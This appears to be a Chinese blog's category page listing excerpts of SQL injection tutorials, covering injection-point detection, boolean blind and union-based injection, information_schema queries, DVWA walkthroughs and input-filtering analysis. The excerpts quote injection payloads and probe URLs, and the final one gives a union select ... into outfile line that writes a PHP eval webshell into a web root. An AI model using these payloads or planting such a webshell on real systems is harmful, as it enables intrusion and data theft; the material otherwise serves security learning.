
SQL注入
文章平均质量分 51
孤君
行百里者半九十
展开
-
常用的SQL注入语句
SQL是一种组织、管理和检索计算机数据库村粗数据的工具,它是一种计算机语言。每天SQL语句均由一个谓词开始,该谓词描述这条语句要产生的动作,列如SELECT或UPDATE关键字。谓词后紧接一条或多天子句,子句中给出了被谓词作用的数据或提供谓词动作的详细信息。每条子句由一个关键字开始,SELECT谓词后为FROM关键字。局部变量(Local Variable)和全局变量(Global Varia...原创 2018-10-11 20:12:03 · 2366 阅读 · 0 评论 -
SQL布尔盲注常用语句
过程1.判断是否存在注入,注入字符型还是数字型2.猜解当前数据库名 数据库长度→库名3.数据库中的表名 几个表→长度→名称4.表中的字段名 字段个数→长度→名称5.数据判断1’ and ‘1’=‘11’ and ‘1’='22.库名1’ and length(database())>3#1’ and length(database())=5 #1’ and mid...原创 2019-08-23 16:14:57 · 3143 阅读 · 0 评论 -
SQL注入常用语句
一、判断类型用and判断其字符类型’ and ‘1’='1 正常返回’ and ‘1’='2 页面正常,但是与上个页面相比,没有查询数据(网站没对sql输入做特殊过滤和处理) 字符型上两条必须是一起判断的’ and ‘1’='1 非正常返回,显示错误。可能性 1.有过滤 2.闭合符不对 3.不是字符型总:如果是字符型,那么 ’ and ‘1’=‘1 正常,’ and ‘...原创 2019-08-23 16:12:42 · 726 阅读 · 0 评论 -
SQL中的and、or
在sql查询语句中长用到and和or,它们在用的时候有些需要注意的地方不管在一项表达式中有多少个and或or,它是将前一个表达式看作一项,and与or后的所有表达式看做一项。and的前后都为真的时候才为真,取交集or有一个为真,即为真,取并集 select * from users where 1=1; # 1=1 即全集 select * from users where id...原创 2019-07-17 16:41:38 · 12693 阅读 · 1 评论 -
Sql盲注截取字符串常用函数
Sql盲注截取字符串常用函数 在sql注入中,往往会用到截取字符串的问题,例如不回显的情况下进行的注入,也成为盲注,这种情况下往往需要一个一个字符的去猜解,过程中需要用到截取字符串。本文中主要列举三个函数和该函数注入过程中的一些用例。Ps;此处用mysql进行说明,其他类型数据库请自行检...原创 2019-07-18 14:20:58 · 937 阅读 · 0 评论 -
SQL注入中mysql中常用到的表
在SQL注入中,会经常对mysql数据库的information_schema数据库中的一些表进行查询,一次来获得自已想要的信息。常用的表有:SCHEMATA表: 提供了当前mysql实例中所有数据库的信息。是show databases的结果取之此表。TABLES表: 提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个schema,表类型,表引擎,创建时间等信息。是show...原创 2019-04-03 15:31:55 · 2194 阅读 · 0 评论 -
SQL注入中数据库的判断
方法一:用@@datadir查看数据库安装目录,能否判断出方法二:通过各个数据库特有的数据表来判断1、mssql数据库 http://127.0.0.1/test.php?id=1 and (select count(*) from sysobjects)>0 and 1=12、access数据库 http://127.0.0.1/test.php?id=1 and (s...原创 2019-04-03 08:46:25 · 3830 阅读 · 2 评论 -
SQL注入中常用的字段或函数
user()返回当前数据库连接使用的用户;database()返回当前数据库连接使用的数据库;version()返回当前数据库的版本;原创 2019-04-02 18:28:43 · 1479 阅读 · 0 评论 -
SQL注入点的判断
分类1、常见的sql注入按照参数类型可分为两种:数字型和字符型。当发生注入点的参数为整数时,比如 ID,num,page等,这种形式的就属于数字型注入漏洞。同样,当注入点是字符串时,则称为字符型注入,字符型注入需要引号来闭合。2、也可以根据数据库返回的结果,分为回显注入、报错注入、盲注。回显注入:可以直接在存在注入点的当前页面中获取返回结果。报错注入:程序将数据库的返回错误信息直接显示在...原创 2019-04-02 13:04:40 · 5677 阅读 · 0 评论 -
DVWA ---SQL Injection
手工注入的一般步骤: 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定显示的字段顺序 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.下载数据dvwa中的代码分析Low<?phpif( isset( $_REQUEST[ 'Submit' ] ) ) {...原创 2018-11-28 11:04:44 · 300 阅读 · 0 评论 -
在SQL注入中常用的mysql语法
user()返回当前数据库连接使用的用户;database()返回当前数据库连接使用的数据库;version()返回当前数据库的版本;concat-ws() 函数可以将这些函数进行组合使用并显示出来。concat函数中,将其中的参数直接连接起来产生新的字符串。而在concat_ws函数中,第一个参数是用于作为分隔符将后面各个参数的内容分隔开来再进行相应的连接产生新的字符串。concat_w...原创 2018-10-29 22:45:26 · 943 阅读 · 0 评论 -
SQL注入的过滤代码分析
SQL注入:在用户的输入没有为转义字符过滤时,就会发生这样这种形式的注入式攻击。所以在在有SQL查询语句的网页中对字符的过滤时很重要的。在没有任何过滤时,是很危险的,用户可以在提交的数据中,插入自己想要插入攻击代码。mysql_real_escape_string()PHP的mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。下列字符...原创 2018-10-18 09:33:06 · 881 阅读 · 0 评论 -
SQL注入---联合查询注入
注入条件页面有显示位,即在一个网站的正常页面,服务端执行SQL语句查询数据库中的数据,客户端将数据展示在页面中,这个展示数据的位置就叫显示位。找的注入点→查询列数→找到显示位→获取列中的信息注入点:http://192.168.1.3:8008/onews.asp?id=45查询列数http://192.168.1.3:8008/onews.asp?id=45 order by 猜测的列...原创 2018-10-13 17:13:56 · 998 阅读 · 0 评论 -
DVWA之php+mysql手工注入
DVWA 页面输入user ID ,输入 1。看到如下信息在此点尝试注入,输入‘ ’ ’,判断其注入类型。初步判断是数字型注入,在输入 &quot; 1 or 1=1 &quot;,尝试遍历数据表判断字符型:&quot; 1’ or ‘1’='1 &quot;利用 order by num 来测试查询表的列, 输入: &quot; 1’ order by 1 – &原创 2018-10-17 20:59:18 · 370 阅读 · 0 评论 -
SQL注入测试
概述一般通过远程测试判断是否存在SQL注入( 列如,通过internet 并作为应用渗透测试的一部分 )。所以通常没有机会通过查看源代码来复查注入的查询的结构,因此常常需要进行大量的测试。寻找SQL注入SQL注入可以出现在任何从系统或用户接收数据输入的前端应用程序中,这些应用程序之后被用于访问数据库服务器。在Web环境中,Web浏览器是客户端,它扮演向用户请求数据并将数据发送到远程服务器的...原创 2018-10-06 20:51:21 · 4032 阅读 · 0 评论 -
SQL手工注入---表的猜解
手工注入过程找到注入点→表名→列名→列长度→列值注入点:http://www.xxx.com/index.asp?id=1猜解表名http://www.xxx.com/index.asp?id=1 and exists(select * from 猜测的表名)猜解列名http://www.xxx.com/index.asp?id=1 and exists(select 猜测的列名 fr...原创 2018-10-13 10:32:54 · 2396 阅读 · 0 评论 -
SQL注入原理
概述SQL注入: 应用程序在向后台数据库传递SQL( Structured Query Language , 结构化查询语言 )查询时,如果攻击者提供了影响该查询的能力,就会引发SQL注入。SQL注入不只是一种会影响Web应用的漏洞,对于任何从不可信源获取输入的代码来说,如果使用输入来构造动态SQL语句,就有可能也会受到攻击。Web应用原理Web应用它们都具有交互性并且多半是数据库驱动的...原创 2018-10-06 15:45:26 · 869 阅读 · 0 评论 -
mysql写入一句话的方式
一、union select 后写入最常见的写入方式,union select 后跟 into outfile 语句1’ union select 1,2,’<?php @eval($_POST[cmd]);?>’ into outfile “C:\phpStudy\PHPTutorial\WWW\shell.php” --+1’ union select 1,2,’<?p...原创 2019-09-30 14:55:45 · 1367 阅读 · 0 评论